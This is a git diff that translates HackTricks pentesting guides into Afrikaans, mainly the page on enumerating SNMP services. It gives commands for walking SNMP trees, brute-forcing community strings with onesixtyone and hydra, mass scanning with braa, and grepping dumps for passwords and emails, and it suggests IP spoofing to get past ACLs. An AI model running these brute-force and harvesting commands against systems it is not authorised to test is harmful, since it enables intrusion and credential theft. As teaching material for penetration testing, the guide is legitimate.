-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-snmp/README.md b/network-services-pentesting/pentesting-snmp/README.md
index cd900fe30..ef70d0d00 100644
--- a/network-services-pentesting/pentesting-snmp/README.md
+++ b/network-services-pentesting/pentesting-snmp/README.md
@@ -2,132 +2,126 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 \
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien!
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
-## Basic Information
-
-**SNMP - Simple Network Management Protocol** is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
+## Basiese Inligting
 
+**SNMP - Simple Network Management Protocol** is 'n protokol wat gebruik word om verskillende toestelle in die netwerk te monitor (soos roeteryers, skakelaars, drukkers, IoT-toestelle...).
 ```
 PORT    STATE SERVICE REASON                 VERSION
 161/udp open  snmp    udp-response ttl 244   ciscoSystems SNMPv3 server (public)
 ```
-
 {% hint style="info" %}
-SNMP also uses the port **162/UDP** for **traps**. These are data **packets sent from the SNMP server to the client without being explicitly requested**.
+SNMP gebruik ook die poort **162/UDP** vir **traps**. Dit is data **pakkies wat van die SNMP-bediener na die kliënt gestuur word sonder om eksplisiet aangevra te word**.
 {% endhint %}
 
 ### MIB
 
-To ensure that SNMP access works across manufacturers and with different client-server combinations, the **Management Information Base (MIB)** was created. MIB is an **independent format for storing device information**. A MIB is a **text** file in which all queryable **SNMP objects** of a device are listed in a **standardized** tree hierarchy. It contains at **least one `Object Identifier` (`OID`)**, which, in addition to the necessary **unique address** and a **name**, also provides information about the type, access rights, and a description of the respective object\
-MIB files are written in the `Abstract Syntax Notation One` (`ASN.1`) based ASCII text format. The **MIBs do not contain data**, but they explain **where to find which information** and what it looks like, which returns values for the specific OID, or which data type is used.
+Om te verseker dat SNMP-toegang oor vervaardigers en met verskillende kliënt-bediener kombinasies werk, is die **Management Information Base (MIB)** geskep. MIB is 'n **onafhanklike formaat vir die stoor van toestelinligting**. 'n MIB is 'n **tekslêer** waarin alle navraagbare **SNMP-voorwerpe** van 'n toestel in 'n **gestandaardiseerde** boomhiërargie gelys word. Dit bevat ten minste een `Object Identifier` (`OID`), wat, naas die nodige **unieke adres** en 'n **naam**, ook inligting oor die tipe, toegangsregte en 'n beskrywing van die betrokke voorwerp verskaf.\
+MIB-lêers is in die `Abstract Syntax Notation One` (`ASN.1`) gebaseerde ASCII-teksformaat geskryf. Die **MIB's bevat nie data nie**, maar verduidelik **waar om watter inligting te vind** en hoe dit lyk, wat terugkeerwaardes vir die spesifieke OID is, of watter datatipe gebruik word.
 
 ### OIDs
 
-**Object Identifiers (OIDs)** play a crucial role. These unique identifiers are designed to manage objects within a **Management Information Base (MIB)**.
+**Object Identifiers (OIDs)** speel 'n belangrike rol. Hierdie unieke identifiseerders is ontwerp om voorwerpe binne 'n **Management Information Base (MIB)** te bestuur.
 
-The highest levels of MIB object IDs, or OIDs, are allocated to diverse standard-setting organizations. It is within these top levels that the framework for global management practices and standards is established.
+Die hoogste vlakke van MIB-voorwerp-ID's, of OIDs, word toegewys aan diverse standaardstelorganisasies. Dit is binne hierdie topvlakke dat die raamwerk vir globale bestuurspraktyke en standaarde gevestig word.
 
-Furthermore, vendors are granted the liberty to establish private branches. Within these branches, they have the **autonomy to include managed objects pertinent to their own product lines**. This system ensures that there is a structured and organized method for identifying and managing a wide array of objects across different vendors and standards.
+Verkopers word ook die vryheid gegee om private takke te vestig. Binne hierdie takke het hulle die **selfstandigheid om bestuurde voorwerpe wat relevant is vir hul eie produklyne in te sluit**. Hierdie stelsel verseker dat daar 'n gestruktureerde en georganiseerde metode is om 'n wye verskeidenheid voorwerpe oor verskillende verkopers en standaarde te identifiseer en bestuur.
 
 ![](../../.gitbook/assets/snmp\_oid\_mib\_tree.png)
 
-You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what a OID means** (like `1.3.6.1.2.1.1`) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).\
-There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) that references MIB-2 defined Simple Network Management Protocol (SNMP) variables. And from the **OIDs pending from this one** you can obtain some interesting host data (system data, network data, processes data...)
+Jy kan deur 'n **OID-boom** op die web **navigeer** deur hier te gaan: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) of **sien wat 'n OID beteken** (soos `1.3.6.1.2.1.1`) deur [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1) te besoek.\
+Daar is 'n paar **bekende OIDs** soos diegene binne [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) wat verwys na MIB-2 gedefinieerde Simple Network Management Protocol (SNMP) veranderlikes. En van die **OID's wat van hierdie een afhang** kan jy interessante gasheerdata verkry (sisteme data, netwerkdata, prosesse data...)
 
-### **OID Example**
+### **OID-voorbeeld**
 
-[**Example from here**](https://www.netadmintools.com/snmp-mib-and-oids/):
+[**Voorbeeld van hier**](https://www.netadmintools.com/snmp-mib-and-oids/):
 
 **`1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7`**
 
-Here is a breakdown of this address.
+Hier is 'n uiteensetting van hierdie adres.
 
-* 1 – this is called the ISO and it establishes that this is an OID. This is why all OIDs start with “1”
-* 3 – this is called ORG and it is used to specify the organization that built the device.
-* 6 – this is the dod or the Department of Defense which is the organization that established the Internet first.
-* 1 – this is the value of the internet to denote that all communications will happen through the Internet.
-* 4 – this value determines that this device is made by a private organization and not a government one.
-* 1 – this value denotes that the device is made by an enterprise or a business entity.
+* 1 - dit word die ISO genoem en dit stel vas dat dit 'n OID is. Dit is hoekom alle OIDs met "1" begin.
+* 3 - dit word ORG genoem en dit word gebruik om die organisasie wat die toestel gebou het, te spesifiseer.
+* 6 - dit is die dod of die Department of Defense wat die organisasie was wat die Internet eerste gevestig het.
+* 1 - dit is die waarde van die internet om aan te dui dat alle kommunikasie deur die Internet sal plaasvind.
+* 4 - hierdie waarde bepaal dat hierdie toestel deur 'n private organisasie en nie 'n regeringstoestel gemaak is nie.
+* 1 - hierdie waarde dui aan dat die toestel deur 'n onderneming of 'n besigheidsentiteit gemaak is.
 
-These first six values tend to be the same for all devices and they give you the basic information about them. This sequence of numbers will be the same for all OIDs, except when the device is made by the government.
+Hierdie eerste ses waardes is gewoonlik dieselfde vir alle toestelle en dit gee jou die basiese inligting daaroor. Hierdie reeks getalle sal dieselfde wees vir alle OIDs, behalwe as die toestel deur die regering gemaak is.
 
-Moving on to the next set of numbers.
+Gaan voort na die volgende stel getalle.
 
-* 1452 – gives the name of the organization that manufactured this device.
-* 1 – explains the type of device. In this case, it is an alarm clock.
-* 2 – determines that this device is a remote terminal unit.
+* 1452 - gee die naam van die organisasie wat hierdie toestel vervaardig het.
+* 1 - verduidelik die tipe toestel. In hierdie geval is dit 'n wekker.
+* 2 - bepaal dat hierdie toestel 'n afgeleë terminaleenheid is.
 
-The rest of the values give specific information about the device.
+Die res van die waardes gee spesifieke inligting oor die toestel.
 
-* 5 – denotes a discrete alarm point.
-* 1 – specific point in the device
-* 3 – port
-* 21 – address of the port
-* 1 – display for the port
-* 4 – point number
-* 7 – state of the point
+* 5 - dui op 'n diskrete alarm punt.
+* 1 - spesifieke punt in die toestel
+* 3 - poort
+* 21 - adres van die poort
+* 1 - vertoon vir die poort
+* 4 - puntnommer
+* 7 - toestand van die punt
 
-### SNMP Versions
+### SNMP-weergawes
 
-There are 2 important versions of SNMP:
+Daar is 2 belangrike weergawes van SNMP:
 
-* **SNMPv1**: Main one, it is still the most frequent, the **authentication is based on a string** (community string) that travels in **plain-text** (all the information travels in plain text). **Version 2 and 2c** send the **traffic in plain text** also and uses a **community string as authentication**.
-* **SNMPv3**: Uses a better **authentication** form and the information travels **encrypted** using (**dictionary attack** could be performed but would be much harder to find the correct creds than in SNMPv1 and v2).
+* **SNMPv1**: Die belangrikste een, dit is steeds die mees voorkomende, die **outentisering is gebaseer op 'n string** (gemeenskapsnaam) wat in **platte teks** reis (alle inligting reis in platte teks). **Weergawe 2 en 2c** stuur die **verkeer ook in platte teks** en gebruik 'n **gemeenskapsnaam as outentisering**.
+* **SNMPv3**: Gebruik 'n beter **outentiseringsvorm** en die inligting reis **gekripteer** met behulp van (daar kan 'n **woordeboekaanval** uitgevoer word, maar dit sal baie moeiliker wees om die korrekte geloofsbriewe as in SNMPv1 en v2 te vind).
 
-### Community Strings
+### Gemeenskapsname
 
-As mentioned before, **in order to access the information saved on the MIB you need to know the community string on versions 1 and 2/2c and the credentials on version 3.**\
-The are **2 types of community strings**:
+Soos voorheen genoem, **om toegang te verkry tot die inligting wat in die MIB gestoor is, moet jy die gemeenskapsnaam in weergawes 1 en 2/2c weet en die geloofsbriewe in weergawe 3.**\
+Daar is **2 tipes gemeenskapsname**:
 
-* **`public`** mainly **read only** functions
-* **`private`** **Read/Write** in general
+* **`public`** hoofsaaklik **slegs lees** funksies
+* **`private`** **Lees/Skryf** in die algemeen
 
-Note that **the writability of an OID depends on the community string used**, so **even** if you find that "**public**" is being used, you could be able to **write some values.** Also, there **may** exist objects which are **always "Read Only".**\
-If you try to **write** an object a **`noSuchName` or `readOnly` error** is received\*\*.\*\*
+Let daarop dat **die skryfbaarheid van 'n OID afhang van die gebruikte gemeenskapsnaam**, so **selfs** as jy vind dat "**public**" gebruik word, kan jy dalk in staat wees om **waardes te skryf**. Daar **kan** ook voorwerpe wees wat **altyd "Slegs lees" is**.\
+As jy probeer om 'n voorwerp te **skryf**, sal 'n **`noSuchName` of `readOnly`-fout** ontvang word\*\*.\*\*
 
-In versions 1 and 2/2c if you to use a **bad** community string the server wont **respond**. So, if it responds, a **valid community strings was used**.
+In weergawes 1 en 2/2c, as jy 'n **slegte** gemeenskapsnaam gebruik, sal die bediener nie **reageer** nie. Dus, as dit reageer, is 'n **geldige gemeenskapsnaam gebruik**.
 
-## Ports
+## Poorte
 
-[From Wikipedia](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#:~:text=All%20SNMP%20messages%20are%20transported,port%20161%20in%20the%20agent.):
+[Vanaf Wikipedia](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#:~:text=All%20SNMP%20messages%20are%20transported,port%20161%20in%20the%20agent.):
 
-* The SNMP agent receives requests on UDP port **161**.
-* The manager receives notifications ([Traps](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#InformRequest)) on port **162**.
-* When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport\_Layer\_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram\_Transport\_Layer\_Security), requests are received on port **10161** and notifications are sent to port **10162**.
+* Die SNMP-agent ontvang versoek op UDP-poort **161**.
+* Die bestuurder ontvang kennisgewings ([Traps](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#Trap) en [InformRequests](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#InformRequest)) op poort **162**.
+* Wanneer dit saam met [Transport Layer Security](https://en.wikipedia.org/wiki/Transport\_Layer\_Security) of [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram\_Transport\_Layer\_Security) gebruik word, word versoek op poort **10161** ontvang en kennisgewings word na poort **10162** gestuur.
 
-## Brute-Force Community String (v1 and v2c)
+## Brute-Force Gemeenskapsnaam (v1 en v2c)
 
-To **guess the community string** you could perform a dictionary attack. Check [here different ways to perform a brute-force attack against SNMP](../../generic-methodologies-and-resources/brute-force.md#snmp). A frequently used community string is `public`.
-
-## Enumerating SNMP
-
-It is recommanded to install the following to see whats does mean **each OID gathered** from the device:
+Om die gemeenskapsnaam te **raai**, kan jy 'n woordelysaanval uitvoer. Kyk [hier verskillende maniere om 'n brute-force-aanval teen SNMP uit te voer](../../generic-methodologies-and-resources/brute-force.md#snmp). 'n Gemeenskapsnaam wat dikwels gebruik word, is `public`.
+## Opstel van SNMP
 
+Dit word aanbeveel om die volgende te installeer om te sien wat beteken **elke OID wat ingesamel is** van die toestel:
 ```bash
 apt-get install snmp-mibs-downloader
 download-mibs
 # Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
 sudo vi /etc/snmp/snmp.conf
 ```
-
-If you know a valid community string, you can access the data using **SNMPWalk** or **SNMP-Check**:
-
+As jy 'n geldige gemeenskapsnaam weet, kan jy toegang verkry tot die data deur gebruik te maak van **SNMPWalk** of **SNMP-Check**:
 ```bash
 snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot
 snmpbulkwalk -c public -v2c 10.10.11.136 .
@@ -143,178 +137,159 @@ nmap --script "snmp* and not snmp-brute" 
 
 braa @:.1.3.6.* #Bruteforce specific OID
 ```
-
-Thanks to extended queries (download-mibs), it is possible to enumerate even more about the system with the following command :
-
+Dankie aan uitgebreide navrae (laai-mibs af), is dit moontlik om selfs meer oor die stelsel op te som met die volgende bevel:
 ```bash
 snmpwalk -v X -c public  NET-SNMP-EXTEND-MIB::nsExtendOutputFull
 ```
+**SNMP** het baie inligting oor die gasheer en dinge wat jy interessant mag vind, is: **Netwerkinterfaces** (IPv4 en **IPv6**-adres), Gebruikersname, Bedryfstyd, Bediener / OS-weergawe, en **prosesse** wat **loop** (kan wagwoorde bevat)....
 
-**SNMP** has a lot of information about the host and things that you may find interesting are: **Network interfaces** (IPv4 and **IPv6** address), Usernames, Uptime, Server/OS version, and **processes**
+### **Gevaarlike instellings**
 
-**running** (may contain passwords)....
+In die wêreld van netwerkbestuur is sekere konfigurasies en parameters sleutel tot omvattende monitering en beheer.
 
-### **Dangerous Settings**
+### Toegangsinstellings
 
-In the realm of network management, certain configurations and parameters are key to ensuring comprehensive monitoring and control. 
+Twee hoofinstellings maak toegang tot die **volledige OID-boom** moontlik, wat 'n belangrike komponent in netwerkbestuur is:
 
-### Access Settings
+1. **`rwuser noauth`** is ingestel om volledige toegang tot die OID-boom sonder die nodigheid van outentifikasie toe te laat. Hierdie instelling is eenvoudig en maak onbeperkte toegang moontlik.
 
-Two main settings enable access to the **full OID tree**, which is a crucial component in network management:
+2. Vir meer spesifieke beheer kan toegang verleen word deur gebruik te maak van:
+- **`rwcommunity`** vir **IPv4**-adresse, en
+- **`rwcommunity6`** vir **IPv6**-adresse.
 
-1. **`rwuser noauth`** is set to permit full access to the OID tree without the need for authentication. This setting is straightforward and allows for unrestricted access.
+Beide opdragte vereis 'n **gemeenskapsnaam** en die betrokke IP-adres, en bied volledige toegang ongeag die oorsprong van die versoek.
 
-2. For more specific control, access can be granted using:
-    - **`rwcommunity`** for **IPv4** addresses, and
-    - **`rwcommunity6`** for **IPv6** addresses.
-    
-Both commands require a **community string** and the relevant IP address, offering full access irrespective of the request's origin.
+### SNMP-parameters vir Microsoft Windows
 
-### SNMP Parameters for Microsoft Windows
+'n Reeks **Bestuursinligtingsbasis (MIB) waardes** word gebruik om verskillende aspekte van 'n Windows-stelsel te monitor deur SNMP:
 
-A series of **Management Information Base (MIB) values** are utilized to monitor various aspects of a Windows system through SNMP:
-
-- **System Processes**: Accessed via `1.3.6.1.2.1.25.1.6.0`, this parameter allows for the monitoring of active processes within the system.
-- **Running Programs**: The `1.3.6.1.2.1.25.4.2.1.2` value is designated for tracking currently running programs.
-- **Processes Path**: To determine where a process is running from, the `1.3.6.1.2.1.25.4.2.1.4` MIB value is used.
-- **Storage Units**: The monitoring of storage units is facilitated by `1.3.6.1.2.1.25.2.3.1.4`.
-- **Software Name**: To identify the software installed on a system, `1.3.6.1.2.1.25.6.3.1.2` is employed.
-- **User Accounts**: The `1.3.6.1.4.1.77.1.2.25` value allows for the tracking of user accounts.
-- **TCP Local Ports**: Finally, `1.3.6.1.2.1.6.13.1.3` is designated for monitoring TCP local ports, providing insight into active network connections.
+- **Stelselprosesse**: Toegang tot `1.3.6.1.2.1.25.1.6.0`, hierdie parameter maak dit moontlik om aktiewe prosesse binne die stelsel te monitor.
+- **Lopende Programme**: Die waarde `1.3.6.1.2.1.25.4.2.1.2` is bedoel vir die opspoor van tans lopende programme.
+- **Prosessepad**: Om vas te stel waar 'n proses vanaf loop, word die MIB-waarde `1.3.6.1.2.1.25.4.2.1.4` gebruik.
+- **Stoor-eenhede**: Die monitering van stoor-eenhede word fasiliteer deur `1.3.6.1.2.1.25.2.3.1.4`.
+- **Sagtewarenaam**: Om die sagteware wat op 'n stelsel geïnstalleer is te identifiseer, word `1.3.6.1.2.1.25.6.3.1.2` gebruik.
+- **Gebruikersrekeninge**: Die waarde `1.3.6.1.4.1.77.1.2.25` maak dit moontlik om gebruikersrekeninge te monitor.
+- **TCP Plaaslike Poorte**: Laastens, word `1.3.6.1.2.1.6.13.1.3` aangewys vir die monitering van TCP plaaslike poorte, wat insig bied in aktiewe netwerkverbindings.
 
 ### Cisco
 
-Take a look to this page if you are Cisco equipment:
+Kyk na hierdie bladsy as jy Cisco-toerusting het:
 
 {% content-ref url="cisco-snmp.md" %}
 [cisco-snmp.md](cisco-snmp.md)
 {% endcontent-ref %}
 
-## From SNMP to RCE
+## Van SNMP tot RCE
 
-If you have the **string** that allows you to **write values** inside the SNMP service, you may be able to abuse it to **execute commands**:
+As jy die **string** het wat jou in staat stel om waardes binne die SNMP-diens te **skryf**, kan jy dit moontlik misbruik om **opdragte uit te voer**:
 
 {% content-ref url="snmp-rce.md" %}
 [snmp-rce.md](snmp-rce.md)
 {% endcontent-ref %}
 
-## **Massive SNMP**
+## **Massiewe SNMP**
 
-[Braa ](https://github.com/mteg/braa)is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.
+[Braa ](https://github.com/mteg/braa)is 'n massiewe SNMP-skandeerder. Die bedoeling van so 'n instrument is natuurlik om SNMP-navrae te maak - maar anders as snmpwalk van net-snmp, kan dit gelyktydig tientalle of honderde gasheerstelsels ondervra en in 'n enkele proses hanteer. Dit verbruik dus baie min stelselhulpbronne en doen die skandering BAIE vinnig.
 
-Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.
-
-**Syntax:** braa \[Community-string]@\[IP of SNMP server]:\[iso id]
+Braa implementeer sy EIE SNMP-stapel, dus het dit GEEN SNMP-biblioteke soos net-snmp nodig nie.
 
+**Sintaksis:** braa \[Gemeenskapsnaam]@\[IP van SNMP-bediener]:\[iso-id]
 ```bash
 braa ignite123@192.168.1.125:.1.3.6.*
 ```
-
-This can extract a lot MB of information that you cannot process manually.
+Dit kan baie MB aan inligting onttrek wat jy nie handmatig kan verwerk nie.
 
 
-So, lets look for the most interesting information (from [https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)):
+So, laat ons kyk vir die mees interessante inligting (vanaf [https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)):
 
 
-### **Devices**
-
-The process begins with the extraction of **sysDesc MIB data** (1.3.6.1.2.1.1.1.0) from each file to identify the devices. This is accomplished through the use of a **grep command**:
-
+### **Toestelle**
 
+Die proses begin met die onttrekking van **sysDesc MIB-data** (1.3.6.1.2.1.1.1.0) uit elke lêer om die toestelle te identifiseer. Dit word bereik deur die gebruik van 'n **grep-opdrag**:
 ```bash
 grep ".1.3.6.1.2.1.1.1.0" *.snmp
 ```
+### **Identifiseer Privaat String**
 
-### **Identify Private String**
-
-A crucial step involves identifying the **private community string** used by organizations, particularly on Cisco IOS routers. This string enables the extraction of **running configurations** from routers. The identification often relies on analyzing SNMP Trap data for the word "trap" with a **grep command**:
-
+'n Belangrike stap behels die identifisering van die **privaat gemeenskapsnaam** wat deur organisasies gebruik word, veral op Cisco IOS-roeternetwerke. Hierdie string maak dit moontlik om **lopende konfigurasies** van roeternetwerke te onttrek. Die identifikasie berus dikwels op die analise van SNMP Trap-data vir die woord "trap" met 'n **grep-opdrag**:
 ```bash
 grep -i "trap" *.snmp
 ```
+### **Gebruikersname/ Wagwoorde**
 
-### **Usernames/Passwords**
-
-Logs stored within MIB tables are examined for **failed logon attempts**, which might accidentally include passwords entered as usernames. Keywords such as _fail_, _failed_, or _login_ are searched to find valuable data:
-
+Logs wat in MIB-tabelle gestoor word, word ondersoek vir **mislukte aanmeldingspogings**, wat per ongeluk wagwoorde kan insluit wat as gebruikersname ingevoer is. Sleutelwoorde soos _misluk_, _mislukte_, of _aanmelding_ word gesoek om waardevolle data te vind:
 ```bash
 grep -i "login\|fail" *.snmp
 ```
+### **E-posse**
 
-### **Emails**
-
-Finally, to extract **email addresses** from the data, a **grep command** with a regular expression is used, focusing on patterns that match email formats:
-
+Uiteindelik, om **e-posadressse** uit die data te onttrek, word 'n **grep-opdrag** met 'n regulêre uitdrukking gebruik, wat fokus op patrone wat ooreenstem met e-posformate:
 ```bash
 grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
 ```
+## Wysiging van SNMP-waardes
 
-
-## Modifying SNMP values
-
-You can use _**NetScanTools**_ to **modify values**. You will need to know the **private string** in order to do so.
+Jy kan _**NetScanTools**_ gebruik om waardes te **verander**. Jy sal die **privaat string** moet weet om dit te doen.
 
 ## Spoofing
 
-If there is an ACL that only allows some IPs to query the SMNP service, you can spoof one of this addresses inside the UDP packet an sniff the traffic.
+As daar 'n ACL is wat slegs sekere IP-adresse toelaat om die SNMP-diens te ondervra, kan jy een van hierdie adresse in die UDP-pakket vervals en die verkeer afluister.
 
-## Examine SNMP Configuration files
+## Ondersoek SNMP-konfigurasie lêers
 
 * snmp.conf
 * snmpd.conf
 * snmp-config.xml
 
-## HackTricks Automatic Commands
-
+## HackTricks Outomatiese Opdragte
 ```
 Protocol_Name: SNMP    #Protocol Abbreviation if there is one.
 Port_Number:  161     #Comma separated if there is more than one.
 Protocol_Description: Simple Network Managment Protocol         #Protocol Abbreviation Spelled out
 
 Entry_1:
-  Name: Notes
-  Description: Notes for SNMP
-  Note: |
-    SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
+Name: Notes
+Description: Notes for SNMP
+Note: |
+SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
 
-    https://book.hacktricks.xyz/pentesting/pentesting-snmp
+https://book.hacktricks.xyz/pentesting/pentesting-snmp
 
 Entry_2:
-  Name: SNMP Check
-  Description: Enumerate SNMP
-  Command: snmp-check {IP}
+Name: SNMP Check
+Description: Enumerate SNMP
+Command: snmp-check {IP}
 
 Entry_3:
-  Name: OneSixtyOne
-  Description: Crack SNMP passwords
-  Command: onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt {IP} -w 100
+Name: OneSixtyOne
+Description: Crack SNMP passwords
+Command: onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt {IP} -w 100
 
 Entry_4:
-  Name: Nmap
-  Description: Nmap snmp (no brute)
-  Command: nmap --script "snmp* and not snmp-brute" {IP}
+Name: Nmap
+Description: Nmap snmp (no brute)
+Command: nmap --script "snmp* and not snmp-brute" {IP}
 
 Entry_5:
-  Name: Hydra Brute Force
-  Description: Need Nothing
-  Command: hydra -P {Big_Passwordlist} -v {IP} snmp
+Name: Hydra Brute Force
+Description: Need Nothing
+Command: hydra -P {Big_Passwordlist} -v {IP} snmp
 ```
-
 \
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**Foutbounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **foutbounty platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings te verdien tot **$100,000**!
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 

diff --git a/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/network-services-pentesting/pentesting-snmp/cisco-snmp.md
index ce164aca0..5023a3423 100644
--- a/network-services-pentesting/pentesting-snmp/cisco-snmp.md
